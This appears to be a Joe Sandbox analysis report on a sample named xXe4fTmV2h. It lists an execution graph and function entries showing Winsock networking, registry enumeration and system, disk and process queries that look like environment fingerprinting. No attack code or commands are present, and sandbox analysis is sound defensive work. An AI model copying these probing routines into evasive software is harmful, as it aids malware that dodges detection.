                                      execution_graph 76325 c1d5e0 76326 c1d652 WSAStartup 76325->76326 76327 c1d5f0 76325->76327 76326->76327 76137 c3b3c0 76138 c3b3cb 76137->76138 76139 c3b3ee 76137->76139 76143 c076a0 76138->76143 76147 c39290 76138->76147 76140 c3b3ea 76144 c076c0 76143->76144 76145 c076e6 send 76143->76145 76144->76145 76146 c076c9 76144->76146 76145->76146 76146->76140 76148 c076a0 send 76147->76148 76150 c392e5 76148->76150 76149 c39392 76149->76140 76150->76149 76151 c39335 WSAIoctl 76150->76151 76151->76149 76152 c39366 76151->76152 76152->76149 76153 c39371 setsockopt 76152->76153 76153->76149 76154 c3e400 76155 c3e412 76154->76155 76157 c3e459 76154->76157 76158 c368b0 socket ioctlsocket connect getsockname closesocket 76155->76158 76158->76157 76159 c3b400 76160 c3b425 76159->76160 76161 c3b40b 76159->76161 76164 c07770 76161->76164 76162 c3b421 76165 c07790 76164->76165 76166 c077b6 recv 76164->76166 76165->76166 76167 c07799 76165->76167 76166->76167 76167->76162 76168 c013c9 76172 c01160 76168->76172 76171 c013a1 76172->76171 76173 f893e0 76172->76173 76183 f88a20 isxdigit _lock 76172->76183 76174 f893f3 76173->76174 76180 f89400 76173->76180 76174->76172 76175 f89688 76175->76174 76176 f896c7 76175->76176 76184 f89280 vfprintf 76175->76184 76185 f89220 vfprintf 76176->76185 76179 f896df 76179->76172 76180->76174 76180->76175 76180->76176 76181 f89280 vfprintf 76180->76181 76182 f89220 vfprintf 76180->76182 76181->76180 76182->76180 76183->76172 76184->76175 76185->76179 76186 cb3c00 76187 cb3c23 76186->76187 76189 cb3c0d 76186->76189 76187->76189 76190 ccb180 76187->76190 76191 ccb2e3 76190->76191 76192 ccb19b 76190->76192 76191->76189 76192->76191 76195 ccb2a9 getsockname 76192->76195 76196 ccb020 closesocket 76192->76196 76198 ccaf30 76192->76198 76202 ccb060 76192->76202 76207 ccb020 76195->76207 76196->76192 76199 ccaf4c 76198->76199 76200 ccaf63 socket 76198->76200 76199->76200 76201 ccaf52 76199->76201 76200->76192 76201->76192 76203 ccb080 76202->76203 76204 ccb0b0 connect 76203->76204 76205 ccb0bf WSAGetLastError 76203->76205 76206 ccb0ea 76203->76206 76204->76205 76205->76203 76205->76206 76206->76192 76208 ccb029 76207->76208 76209 ccb052 76207->76209 76210 ccb04b closesocket 76208->76210 76211 ccb03e 76208->76211 76209->76192 76210->76209 76211->76192 76328 cb4720 76332 cb4728 76328->76332 76329 cb4733 76331 cb4774 76332->76329 76339 cb476c 76332->76339 76340 cb5540 socket ioctlsocket connect getsockname closesocket 76332->76340 76334 cb482e 76334->76339 76341 cb9270 76334->76341 76336 cb4860 76346 cb4950 76336->76346 76338 cb4878 76339->76338 76352 cb30a0 socket ioctlsocket connect getsockname closesocket 76339->76352 76340->76334 76353 cba440 76341->76353 76343 cb9297 76344 cb92ab 76343->76344 76381 cbbbe0 socket ioctlsocket connect getsockname closesocket 76343->76381 76344->76336 76348 cb4966 76346->76348 76347 cb4aa0 gethostname 76349 cb49b9 76347->76349 76351 cb49c5 76347->76351 76348->76349 76348->76351 76382 cbbbe0 socket ioctlsocket connect getsockname closesocket 76348->76382 76349->76347 76349->76351 76351->76339 76352->76331 76379 cba46b 76353->76379 76354 cbaa03 RegOpenKeyExA 76355 cbab70 RegOpenKeyExA 76354->76355 76356 cbaa27 RegQueryValueExA 76354->76356 76359 cbab90 76355->76359 76360 cbac34 RegOpenKeyExA 76355->76360 76357 cbaacc RegQueryValueExA 76356->76357 76358 cbaa71 76356->76358 76362 cbab0e 76357->76362 76363 cbab66 RegCloseKey 76357->76363 76358->76357 76366 cbaa85 RegQueryValueExA 76358->76366 76359->76360 76361 cbacf8 RegOpenKeyExA 76360->76361 76376 cbac54 76360->76376 76364 cbad56 RegEnumKeyExA 76361->76364 76367 cbad14 76361->76367 76362->76363 76370 cbab1e RegQueryValueExA 76362->76370 76363->76355 76365 cbad9b 76364->76365 76364->76367 76368 cbae16 RegOpenKeyExA 76365->76368 76369 cbaab3 76366->76369 76367->76343 76371 cbaddf RegEnumKeyExA 76368->76371 76372 cbae34 RegQueryValueExA 76368->76372 76369->76357 76373 cbab4c 76370->76373 76371->76367 76371->76368 76374 cbaf43 RegQueryValueExA 76372->76374 76380 cbadaa 76372->76380 76373->76363 76375 cbb052 RegQueryValueExA 76374->76375 76374->76380 76377 cbadc7 RegCloseKey 76375->76377 76375->76380 76376->76361 76377->76371 76378 cbafa0 RegQueryValueExA 76378->76380 76379->76354 76379->76367 76380->76374 76380->76375 76380->76377 76380->76378 76381->76344 76382->76349 76212 cca080 76215 cc9740 76212->76215 76214 cca09b 76216 cc9780 76215->76216 76220 cc975d 76215->76220 76217 cc9925 RegOpenKeyExA 76216->76217 76216->76220 76218 cc995a RegQueryValueExA 76217->76218 76217->76220 76219 cc9986 RegCloseKey 76218->76219 76219->76220 76220->76214 76221 c38b50 76222 c38b6b 76221->76222 76238 c38bb5 76221->76238 76223 c38bf3 76222->76223 76224 c38b8f 76222->76224 76222->76238 76241 c3a550 76223->76241 76260 c16e40 select 76224->76260 76227 c38bfc 76232 c38c35 76227->76232 76233 c38c1f connect 76227->76233 76227->76238 76239 c38cb2 76227->76239 76228 c38ba1 76229 c38cd9 SleepEx getsockopt 76228->76229 76228->76238 76228->76239 76230 c38d18 76229->76230 76234 c38d43 76230->76234 76230->76239 76231 c3a150 getsockname 76240 c38dff 76231->76240 76256 c3a150 76232->76256 76233->76232 76237 c3a150 getsockname 76234->76237 76237->76238 76239->76231 76239->76238 76239->76240 76240->76238 76261 c078b0 closesocket 76240->76261 76242 c3a575 76241->76242 76246 c3a597 76242->76246 76263 c075e0 76242->76263 76244 c078b0 closesocket 76245 c3a713 76244->76245 76245->76227 76247 c3a811 setsockopt 76246->76247 76252 c3a83b 76246->76252 76254 c3a69b 76246->76254 76247->76252 76249 c3af56 76250 c3af5d 76249->76250 76249->76254 76250->76245 76251 c3a150 getsockname 76250->76251 76251->76245 76252->76254 76255 c3abe1 76252->76255 76269 c36be0 8 API calls 76252->76269 76254->76244 76254->76245 76255->76254 76268 c667e0 ioctlsocket 76255->76268 76257 c3a15f 76256->76257 76259 c3a1d0 76256->76259 76258 c3a181 getsockname 76257->76258 76257->76259 76258->76259 76259->76228 76260->76228 76262 c078c5 76261->76262 76262->76238 76264 c07607 socket 76263->76264 76265 c075ef 76263->76265 76266 c0762b 76264->76266 76265->76264 76267 c07643 76265->76267 76266->76246 76267->76246 76268->76249 76269->76255 76383 c395b0 76384 c395c8 76383->76384 76386 c395fd 76383->76386 76385 c3a150 getsockname 76384->76385 76384->76386 76385->76386 76387 c36ab0 76388 c36ad5 76387->76388 76389 c36bb4 76388->76389 76390 c16fa0 select 76388->76390 76391 cb5ed0 7 API calls 76389->76391 76393 c36b54 76390->76393 76392 c36ba9 76391->76392 76393->76389 76393->76392 76394 c36b5d 76393->76394 76394->76392 76396 cb5ed0 76394->76396 76399 cb5a50 76396->76399 76398 cb5ee5 76398->76394 76400 cb5a58 76399->76400 76406 cb5ea0 76399->76406 76401 cb5a99 76400->76401 76403 cb5b50 76400->76403 76413 cb5b88 76400->76413 76401->76413 76415 cb70a0 6 API calls 76401->76415 76429 cb6f10 socket ioctlsocket connect getsockname closesocket 76401->76429 76402 cb5cae 76404 cb5e96 76402->76404 76418 cca920 76402->76418 76431 cc9320 socket ioctlsocket connect getsockname closesocket 76402->76431 76407 cb5b7a 76403->76407 76408 cb5eb4 76403->76408 76403->76413 76432 cc9480 socket ioctlsocket connect getsockname closesocket 76404->76432 76406->76398 76422 cb70a0 76407->76422 76433 cb6f10 socket ioctlsocket connect getsockname closesocket 76408->76433 76412 cb5ec2 76412->76412 76413->76402 76430 cb5ef0 socket ioctlsocket connect getsockname 76413->76430 76415->76401 76419 cca944 76418->76419 76420 cca977 send 76419->76420 76421 cca94b 76419->76421 76420->76402 76421->76402 76423 cb70ae 76422->76423 76425 cb717f 76423->76425 76427 cb71a7 76423->76427 76434 cca8c0 76423->76434 76438 cb71c0 socket ioctlsocket connect getsockname 76423->76438 76425->76427 76439 cc9320 socket ioctlsocket connect getsockname closesocket 76425->76439 76427->76413 76429->76401 76430->76413 76431->76402 76432->76406 76433->76412 76435 cca8e6 76434->76435 76436 cca903 recvfrom 76434->76436 76435->76436 76437 cca8ed 76435->76437 76436->76437 76437->76423 76438->76423 76439->76427 76270 c031d7 76271 c031f4 76270->76271 76272 c03200 76271->76272 76276 c03223 76271->76276 76277 c015b0 _lock 76272->76277 76274 c0321e 76275 c032dc CloseHandle 76275->76274 76276->76275 76277->76274 76278 c02f17 76286 c02f2c 76278->76286 76279 c031d3 76280 c02fb3 RegOpenKeyExA 76280->76286 76281 c0315c RegEnumKeyExA 76282 c031b2 RegCloseKey 76281->76282 76281->76286 76282->76286 76283 c03046 RegOpenKeyExA 76284 c03089 RegQueryValueExA 76283->76284 76283->76286 76285 c0313b RegCloseKey 76284->76285 76284->76286 76285->76286 76286->76279 76286->76280 76286->76281 76286->76283 76286->76285 76440 1087830 76453 f8dd50 76440->76453 76442 1087866 76443 108785a 76443->76442 76456 f912c0 76443->76456 76445 10878a6 76446 108789a 76446->76445 76447 1087950 76446->76447 76448 1087906 76446->76448 76460 f8b500 _lock 76447->76460 76449 1087944 76448->76449 76461 f8b500 _lock 76448->76461 76451 1087979 76462 f97430 76453->76462 76455 f8dd61 76455->76443 76457 f912cc 76456->76457 76466 f8e050 76457->76466 76459 f912fa 76459->76446 76460->76451 76461->76451 76464 f97444 76462->76464 76463 f97458 76463->76455 76464->76463 76465 f9747c _lock 76464->76465 76465->76455 76469 f8e09d 76466->76469 76467 f8feb6 isxdigit 76467->76469 76468 f8e18e 76468->76459 76469->76467 76469->76468 76470 c11139 76471 c11148 76470->76471 76473 c11527 76471->76473 76475 c10f00 76471->76475 76478 c0fec0 6 API calls 76471->76478 76473->76475 76479 c122d0 6 API calls 76473->76479 76477 c10f7b 76475->76477 76480 c3d4d0 socket ioctlsocket connect getsockname closesocket 76475->76480 76478->76473 76479->76475 76480->76475 76287 c0255d 76288 f89f70 76287->76288 76289 c0256c GetSystemInfo 76288->76289 76290 c02589 76289->76290 76291 c025a0 GlobalMemoryStatusEx 76290->76291 76296 c025ec 76291->76296 76292 c02762 76295 c027d6 KiUserCallbackDispatcher 76292->76295 76293 c0263c GetDriveTypeA 76294 c02655 GetDiskFreeSpaceExA 76293->76294 76293->76296 76294->76296 76297 c027f8 76295->76297 76296->76292 76296->76293 76298 c028d9 FindFirstFileW 76297->76298 76299 c02906 FindNextFileW 76298->76299 76300 c02928 76298->76300 76299->76299 76299->76300 76301 c03d5e 76306 c03d30 76301->76306 76302 c03d90 76310 c0fcb0 6 API calls 76302->76310 76305 c03dc1 76306->76301 76306->76302 76307 c10ab0 76306->76307 76311 c105b0 76307->76311 76309 c10acd 76309->76306 76310->76305 76314 c105bd 76311->76314 76317 c107c7 76311->76317 76312 c10707 WSAEventSelect 76312->76314 76312->76317 76313 c107ef 76313->76317 76320 c10847 76313->76320 76321 c16fa0 76313->76321 76314->76312 76314->76313 76316 c076a0 send 76314->76316 76314->76317 76316->76314 76317->76309 76318 c109e8 WSAEnumNetworkEvents 76319 c109d0 WSAEventSelect 76318->76319 76318->76320 76319->76318 76319->76320 76320->76317 76320->76318 76320->76319 76322 c16fd4 76321->76322 76324 c16feb 76321->76324 76323 c17207 select 76322->76323 76322->76324 76323->76324 76324->76320 76481 c029ff FindFirstFileA 76482 c02a31 76481->76482 76483 c02a5c RegOpenKeyExA 76482->76483 76484 c02a93 76483->76484 76485 c02ade CharUpperA 76484->76485 76486 c02b0a 76485->76486 76487 c02bf9 QueryFullProcessImageNameA 76486->76487 76488 c02c3b CloseHandle 76487->76488 76490 c02c64 76488->76490 76489 c02df1 CloseHandle 76491 c02e23 76489->76491 76490->76489

                                      Executed Functions

                                      Function 00C3F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                      • API String ID: 0-1590685507
                                      • Opcode ID: b088217d5d8d95acb30b21dc33c3a60b84b045a3817113595c04406273b4ed8b
                                      • Instruction ID: 2f7c543cc5c1046b4e0daa40c1e13d8388fcb4d23b18555af3abdf648b9167fe
                                      • Opcode Fuzzy Hash: b088217d5d8d95acb30b21dc33c3a60b84b045a3817113595c04406273b4ed8b
                                      • Instruction Fuzzy Hash: 6DC2C031A043449FD724CF29C484B6AB7E1BF84314F15CA6DECA99B262D771EE85CB81
                                      Function 00C0255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSystemInfo.KERNELBASE ref: 00C02579
                                      • GlobalMemoryStatusEx.KERNELBASE ref: 00C025CC
                                      • GetDriveTypeA.KERNELBASE ref: 00C02647
                                      • GetDiskFreeSpaceExA.KERNELBASE ref: 00C0267E
                                      • KiUserCallbackDispatcher.NTDLL ref: 00C027E2
                                      • FindFirstFileW.KERNELBASE ref: 00C028F8
                                      • FindNextFileW.KERNELBASE ref: 00C0291F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                      • String ID: @$`
                                      • API String ID: 3271271169-3318628307
                                      • Opcode ID: 5b30122554261526ee2e41dd67af9c34ad98465244b4c07c0d38a78bb498123a
                                      • Instruction ID: 95f25e357c1ecf7fa45c3565d772ea63efb9598649852deeacaedd896ac257c8
                                      • Opcode Fuzzy Hash: 5b30122554261526ee2e41dd67af9c34ad98465244b4c07c0d38a78bb498123a
                                      • Instruction Fuzzy Hash: D9D194B49093199FCB14FF68C58469EBBF0BF88344F008969E8D997340E7359A85CF92
                                      Function 00C029FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1365 c029ff-c02a2f FindFirstFileA 1366 c02a31-c02a36 1365->1366 1367 c02a38 1365->1367 1368 c02a3d-c02a91 call 1089c50 call 1089ce0 RegOpenKeyExA 1366->1368 1367->1368 1373 c02a93-c02a98 1368->1373 1374 c02a9a 1368->1374 1375 c02a9f-c02b0c call 1089c50 call 1089ce0 CharUpperA call f88da0 1373->1375 1374->1375 1383 c02b15 1375->1383 1384 c02b0e-c02b13 1375->1384 1385 c02b1a-c02b92 call 1089c50 call 1089ce0 call f88e80 call f88e70 1383->1385 1384->1385 1394 c02b94-c02ba3 1385->1394 1395 c02bcc-c02c66 QueryFullProcessImageNameA CloseHandle call f88da0 1385->1395 1398 c02bb0-c02bca call f88e68 1394->1398 1399 c02ba5-c02bae 1394->1399 1405 c02c68-c02c6d 1395->1405 1406 c02c6f 1395->1406 1398->1394 1398->1395 1399->1395 1407 c02c74-c02ce9 call 1089c50 call 1089ce0 call f88e80 call f88e70 1405->1407 1406->1407 1416 c02dcf-c02e1c call 1089c50 call 1089ce0 CloseHandle 1407->1416 1417 c02cef-c02d49 call f88bb0 call f88da0 1407->1417 1426 c02e23-c02e2e 1416->1426 1430 c02d99-c02dad 1417->1430 1431 c02d4b-c02d63 call f88da0 1417->1431 1428 c02e30-c02e35 1426->1428 1429 c02e37 1426->1429 1433 c02e3c-c02ed6 call 1089c50 call 1089ce0 1428->1433 1429->1433 1430->1416 1431->1430 1437 c02d65-c02d7d call f88da0 1431->1437 1447 c02ed8-c02ee1 1433->1447 1448 c02eea 1433->1448 1437->1430 1443 c02d7f-c02d97 call f88da0 1437->1443 1443->1430 1450 c02daf-c02dc9 call f88e68 1443->1450 1447->1448 1451 c02ee3-c02ee8 1447->1451 1449 c02eef-c02f16 call 1089c50 call 1089ce0 1448->1449 1450->1416 1450->1417 1451->1449
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                      • String ID: 0
                                      • API String ID: 2406880114-4108050209
                                      • Opcode ID: 46bdbcb41a3eeb3a0c133dd124b62fd5d4c7edd3c9550a8443e243b9e1ad0a44
                                      • Instruction ID: 124bcccb94b3b0c24949f2275489a3ef9f3dac4f0b02a42a05868528b9d4d9b8
                                      • Opcode Fuzzy Hash: 46bdbcb41a3eeb3a0c133dd124b62fd5d4c7edd3c9550a8443e243b9e1ad0a44
                                      • Instruction Fuzzy Hash: 8AE1E8B49093099FCB14EF68D98869EBBF4BF44344F508869E898D7344E734DA85DF42
                                      Function 00C105B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1544 c105b0-c105b7 1545 c105bd-c105d4 1544->1545 1546 c107ee 1544->1546 1547 c107e7-c107ed 1545->1547 1548 c105da-c105e6 1545->1548 1547->1546 1548->1547 1549 c105ec-c105f0 1548->1549 1550 c107c7-c107cc 1549->1550 1551 c105f6-c10620 call c17350 call c070b0 1549->1551 1550->1547 1556 c10622-c10624 1551->1556 1557 c1066a-c1068c call c3dec0 1551->1557 1559 c10630-c10655 call c070d0 call c103c0 call c17450 1556->1559 1562 c10692-c106a0 1557->1562 1563 c107d6-c107e3 call c17380 1557->1563 1588 c1065b-c10668 call c070e0 1559->1588 1589 c107ce 1559->1589 1565 c106a2-c106a4 1562->1565 1566 c106f4-c106f6 1562->1566 1563->1547 1569 c106b0-c106e4 call c173b0 1565->1569 1571 c106fc-c106fe 1566->1571 1572 c107ef-c1082b call c13000 1566->1572 1569->1563 1587 c106ea-c106ee 1569->1587 1577 c1072c-c10754 1571->1577 1585 c10831-c10837 1572->1585 1586 c10a2f-c10a35 1572->1586 1578 c10756-c1075b 1577->1578 1579 c1075f-c1078b 1577->1579 1583 c10707-c10719 WSAEventSelect 1578->1583 1584 c1075d 1578->1584 1599 c10791-c10796 1579->1599 1600 c10700-c10703 1579->1600 1583->1563 1597 c1071f 1583->1597 1590 c10723-c10726 1584->1590 1592 c10861-c1087e 1585->1592 1593 c10839-c1084c call c16fa0 1585->1593 1595 c10a37-c10a3a 1586->1595 1596 c10a3c-c10a52 1586->1596 1587->1569 1594 c106f0 1587->1594 1588->1557 1588->1559 1589->1563 1590->1572 1590->1577 1611 c10882-c1088d 1592->1611 1609 c10852 1593->1609 1610 c10a9c-c10aa4 1593->1610 1594->1566 1595->1596 1596->1563 1602 c10a58-c10a81 call c12f10 1596->1602 1597->1590 1599->1600 1604 c1079c-c107c2 call c076a0 1599->1604 1600->1583 1602->1563 1613 c10a87-c10a97 call c16df0 1602->1613 1604->1600 1609->1592 1615 c10854-c1085f 1609->1615 1610->1563 1616 c10970-c10975 1611->1616 1617 c10893-c108b1 1611->1617 1613->1563 1615->1611 1619 c10a19-c10a2c 1616->1619 1620 c1097b-c10989 call c070b0 1616->1620 1621 c108c8-c108f7 1617->1621 1619->1586 1620->1619 1629 c1098f-c1099e 1620->1629 1627 c108f9-c108fb 1621->1627 1628 c108fd-c10925 1621->1628 1630 c10928-c1093f 1627->1630 1628->1630 1631 c109b0-c109c1 call c070d0 1629->1631 1637 c108b3-c108c2 1630->1637 1638 c10945-c1096b 1630->1638 1635 c109a0-c109ae call c070e0 1631->1635 1636 c109c3-c109c7 1631->1636 1635->1619 1635->1631 1639 c109e8-c10a03 WSAEnumNetworkEvents 1636->1639 1637->1616 1637->1621 1638->1637 1641 c109d0-c109e6 WSAEventSelect 1639->1641 1642 c10a05-c10a17 1639->1642 1641->1635 1641->1639 1642->1641
                                      APIs
                                      • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00C10712
                                      • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00C109DD
                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00C109FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: EventSelect$EnumEventsNetwork
                                      • String ID: multi.c
                                      • API String ID: 2170980988-214371023
                                      • Opcode ID: dd9d4a44f940d67144d1fb2b6cd72170d1ad02c3f573a82bf49d02fbcfbe1310
                                      • Instruction ID: 9e8f25ac8ea8f9d98fc8d08c12e1b6c3f48c06f040a4e06a0c8c2c702c413b44
                                      • Opcode Fuzzy Hash: dd9d4a44f940d67144d1fb2b6cd72170d1ad02c3f573a82bf49d02fbcfbe1310
                                      • Instruction Fuzzy Hash: CDD1D5716083019FE710CF64C881BABB7E5FF96344F14492CF89586291E7B4EAC5EB92
                                      Function 00CCB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
